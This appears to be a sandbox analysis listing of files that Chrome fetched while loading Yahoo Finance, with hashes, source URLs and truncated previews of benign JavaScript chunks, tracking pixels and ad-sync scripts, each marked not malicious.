                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:+/p3MW:2ZMW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A3A92A110A37730120B46BF626FD6AF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6D02F7F08F67645A28F999AF4FAB1BE652B44A33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AC50A66435C9FD6B6258A705FD8CE40CEE56CCF55973C1F70B51E3AD7FB3A19A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9BF3F3F0FA4343BE8EDDE699E477A1D619DF1E6A66FBDED41CBFEFDBBD37426957A045E39F63E4CD1C3FE3E256D25CD2EC23DF325AC8608B3C6A05DC76694B23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:ok1DLLR6Gf3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (457)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.8806961233017665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:a1PV6fTJL3lSIss7VU0feFw1PDKTKLA4ev:a1iJxSIDV1feu1sK84w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4B110FF4168F6551B3EF74DF58EF047D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5668BC75EACEFE35E50928DAFD3F4D96A08E4714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1E52AD2B125B6F05F5ED5037BD44186F4B1C2D5FFBAF08E436A3FC1597B214F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:797154B1BA3A9C8DFC21629727E91B234E36140056DCD710DB0A10FEBED5919006E68775FB75DBEB7B34581B69D5D9B04323EFFF606A33336BD96BB7658512C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m22 9.24-7.19-.62L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21 12 17.27 18.18 21l-1.63-7.03zM12 15.4l-3.76 2.27 1-4.28-3.32-2.88 4.38-.38L12 6.1l1.71 4.04 4.38.38-3.32 2.88 1 4.28z"/></svg>',l='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 17.27 18.18 21l-1.64-7.03L22 9.24l-7.19-.61L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21z"/></svg>';export{s as S,l as a};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (15779)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.489889126863118
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Yg6ZEbDsBu9sgsZ+eGi1HgSXZsece2ZtuTYt5ZdV:YEbg49s/+e9H9JsVe2ZtiYt5Zb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FAF4A3C7686B850CB456C52A695DBEA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:14F39FE35014F7C3214F10AB5185F1AA0D4FB4DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:76EAB9BEAF784603010264DB6387F47202820153A05CE025D9DA6BD46933280B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:458D3010454ACBCB6D9AC9D19F2B25F57C7D43C57F3CBA2494D2465B90160B2930FE9DE93A14C651A93F0F50D41DBE1DBB9961AC144498F8CE56F5B3A34DA9A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Sparkline.D1F12_MV.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ie,e as z,d as I,f as A,i as S,q as w,N as T,k as N,n as V,X as ce,y as pe,A as Y,J as G,p as B,K as R,S as D,l as x,x as fe,o as be,P as _e,_ as U}from"./scheduler.Dr9AAxFe.js";import{S as he,i as ue,g as ye,a as J,e as we,t as F,c as ke,b as ve,m as Pe,d as Se}from"./index.DCSmZEjO.js";import{e as W}from"./each.BExQfwb4.js";import{g as H}from"./spread.CgU5AtxT.js";import{f as K,t as Ce,j as X}from"./Sparkline.svelte_svelte_type_style_lang.BXw0JgFc.js";import{g as de,h as Ee}from"./commonUtil.CI22_Irn.js";import{l as Ae}from"./loadSparkline.P-xwuGpq.js";function Oe(o,t,e){return(t=function(n){var r=function(s,l){if(typeof s!="object"||!s)return s;var c=s[Symbol.toPrimitive];if(c!==void 0){var h=c.call(s,l||"default");if(typeof h!="object")return h;throw new TypeError("@@toPrimitive must return a primitive value.")}return(l==="string"?String:Number)(s)}(n,"string");return typeof r=="symbol"?r:r+""}(t))in o?Object.defineProperty(o,t,{value:e,enumerable:!0,configurable:!0,wri
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1944)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.285132654421488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:ecyF/EMGqSWv4Vl63aRCrtd7mz1py7Yna:VyF/1fAV8KIrApy7Yna
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:90D284DF19C3B902C6FE14204B27D3B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9AE4137BD4BC2DEAE662B64FE8E059AE95C65294
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3432EE351AEBAA71B18323967BBDE1D492982F6D7287CC4855904881EF0E8F2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BEB8886C6B7A9972A44A3B4635E2F4151D108019EC6495EDE5CAF9557DA4B64B815D678E9D6AF97E7BC01764FAA8F3A8A427C4158A36A39E664FDFA4046FF871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/LazyRender.jNBrMZfB.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as k,c as E,b as v,j as w,k as _,u as I,g as q,a as z,i as r,I as L,p as m,e as N,d as S,f as j,q as D,F,G,n as M,v as R}from"./scheduler.Dr9AAxFe.js";import{S as V,i as A,t as B,a as H}from"./index.DCSmZEjO.js";import{i as J}from"./intersectUtil.DVqOQxux.js";const K=n=>({loading:n&2,Component:n&4,hasError:n&8}),d=n=>({loading:n[1],Component:n[2],hasError:n[3]});function p(n){let i,e=n[0]==="visibility"&&g(n);return{c(){e&&e.c(),i=m()},l(t){e&&e.l(t),i=m()},m(t,o){e&&e.m(t,o),_(t,i,o)},p(t,o){t[0]==="visibility"?e?e.p(t,o):(e=g(t),e.c(),e.m(i.parentNode,i)):e&&(e.d(1),e=null)},d(t){t&&r(i),e&&e.d(t)}}}function g(n){let i,e,t;return{c(){i=N("div"),this.h()},l(o){i=S(o,"DIV",{"data-testid":!0}),j(i).forEach(r),this.h()},h(){D(i,"data-testid","lazy-render")},m(o,l){_(o,i,l),e||(t=[F(J.call(null,i,{preset:"beforeview"})),G(i,"intersect",n[4])],e=!0)},p:M,d(o){o&&r(i),e=!1,R(t)}}}function O(n){let i,e,t=n[1]&&p(n);const o=n[7].default,l=E(o,n,n[6],d);return{c(){t&&t.c(),i=v(),l&&l.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17353)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.501553080184778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GM3Y37/TE9XBshxZgZwCl6HmfTLFGYv0YLVsvEbh+KLw2Kt6:Xor/TEDsvZShAmfTLFGYv0YLVoEbh+KL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:57542598D9612CE45101DA6E800557FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EDF04BEA7C8B4B18FDF2856DC14D0CC41044621D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7DC6975D3416E13EBD09AE0358BAC461F90A0A3AC0DF37734F47E78FBF42ABBB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CDEFBCE01F8CDA746832C7A0FCDC2EF576284A3171D0A6BC7175E18E27DE2ABE8E96D2F1AB493021063AFAB304917AB38F252ED0C7A3E3C3D6B124AAF27B5121
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Tabs.C4D__cCV.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Oe,A as W,e as Z,b as z,p as Y,d as $,f as x,i as I,j,B as ie,U as R,k as D,x as Ee,a4 as Ue,r as Ge,D as Ke,T as ge,c as He,u as Pe,g as we,a as ze,q as S,_ as ne,P as Re,l as Q,G as de,v as Ye,t as re,h as fe,m as ue,n as ve,N as ke}from"./scheduler.Dr9AAxFe.js";import{S as Fe,i as Je,t as h,g as E,e as H,a as k,c as q,b as V,m as L,d as y}from"./index.DCSmZEjO.js";import{e as se}from"./each.BExQfwb4.js";import{g as me,a as Qe}from"./spread.CgU5AtxT.js";import{U as We}from"./commonUtil.CI22_Irn.js";import{c as Ze,g as oe}from"./i13nUtil.C-uBpR7k.js";import{I as ce}from"./Icon.BSWt_jx8.js";import{S as $e,O as xe}from"./Select.N-a6-Z3E.js";import{T as el}from"./Tooltip.DgP4ayih.js";import{l as je}from"./yf-lock.ClgspVU1.js";import{l as ll}from"./yf-unlock.DelAiXlN.js";import{w as tl}from"./43.CtYdpA_T.js";const al='<svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" viewBox="0 0 48 48"><path d="M24 0C10.7 0 0 10.7 0 24s10.7 24 24 24 24-10.7 24-24S37.3 0 24 0m-6.4 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (4357)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4358
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.374637101746526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:nTNPQmoU6nYzvh+FFFfZb+JZajiU6qECrZvhY5ZvRFlvVDAx9oGF3JqMrMVMYPlO:npIm16ntFfuIP6qbrZvhY5ZvfFJAHoS3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1BE3EC8102E85FCB0BE5C6DEDD9ABCA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:97126C03EDEC25C5041A25405C1E80B0B91F6A6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:83F9A3AC82C75712A14394F935C9E2062144961F623A61D33E81A16AB5F5241D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3A6B8FC3A25474761132AAE575133D6F54A6A0837CE56A8902DD720EB94F43504DE2C1CB416309248B395C6A42915114C59D58DAAFEAAAE4619DD03DB9C649ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as U,p as M,k as h,n as E,i as f,y as W,e as S,t as d,d as C,f as k,h as m,q as y,l as p,m as b,a9 as _}from"./scheduler.Dr9AAxFe.js";import{S as X,i as Y}from"./index.DCSmZEjO.js";import{ap as Z,aq as $,g as x,ar as ee,b as R,P as V,Q as D,as as O,N as w}from"./commonUtil.CI22_Irn.js";function te(s){let e,t=s[8](s[3]||s[2])+"",r;return{c(){e=S("span"),r=d(t),this.h()},l(l){e=C(l,"SPAN",{class:!0});var n=k(e);r=m(n,t),n.forEach(f),this.h()},h(){y(e,"class","bold yf-1uof5l0")},m(l,n){h(l,e,n),p(e,r)},p(l,n){n&12&&t!==(t=l[8](l[3]||l[2])+"")&&b(r,t)},d(l){l&&f(e)}}}function le(s){let e,t=s[8](s[3]||s[2])+"",r,l;return{c(){e=S("fin-streamer"),r=d(t),this.h()},l(n){e=C(n,"FIN-STREAMER",{class:!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-template":!0,"data-value":!0,active:!0});var o=k(e);r=m(o,t),o.forEach(f),this.h()},h(){_(e,"class","price bold yf-1uof5l0"),_(e,"data-symbol",s[4]||s[5]),_(e,"data-field",l=s[0].id),_(e,"data-trend","none"),_(e,"data-template",`${s[7]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=39&external_user_id=ec697e3a-059d-498c-affa-95beeaabd2a9&expiration=1731006881&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?p=156578&predirect=&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=triplelift&gdpr=0&gdpr_consent=&us_privacy=&google_hm=MTk5ODI1NDEzOTIyNDQzNzUxMDc4MQ%3D%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1615), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.020901609734713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:g5Ww5dw4MwlZEa09wmSitQjw4EHG9cBKtVns8RHtm:W5aUl/06mukja7Htm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:12732500BC8E47693F0D777BBE88001C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:97865CCE1C0CD35BAC8AC4B42DC9C6C394DA4809
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A03F9A37E34771C42CF7930B2F466EA2077D149F6DBA0E81982E7715A87DD8EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9ED4368E2415EDEFA87BB461BE701E268F93C076852660B2F3B2E661C25D66CDDDA0DBC236410361935365DD954FE1DDF07541CB44557DE25E85FB73BC2FE2BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-content")[0],s=a&&a.getElementsByTagName("a")[0],n=s&&s.getAttribute("data-uuid"),o=function(t){var e;try{e=JSON.parse(window.localStorage.getItem(t))||{}}catch(t){}return e}(t);if(n!==o)e.classList.remove("D(n)"),Array.prototype.slice.call(e.getElementsByClassName("featurebar-close-button")).forEach((function(e){e.addEventListener("click",(function(){!function(t,e){try{window.localStorage.setItem(t,JSON.stringify(e))}catch(t){}}(t,n)}))}))}if(e.classList&&e.classList.contains&&e.classList.contains("auto-play")){var r=window.getComputedStyle(e).height,l=Array.prototype.slice.call(e.getElementsByClassName("featurebar-content")),i=0,c=(i+1)%l.length;function u(){setTimeout((function(){l[i].style.transitionDuration=".8s",l[i].style.transform="
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=74131446&p=0&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3515)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):172180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4362336069456685
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:6BlfMmo2ReH8rn7yrsrNrLpABoOSRsrtzrHNZNK97:6BlfMmPe6JLCBlSRsJrNZNK97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EAD8C4C2025B45C9DE8C5DE4E0FB678F
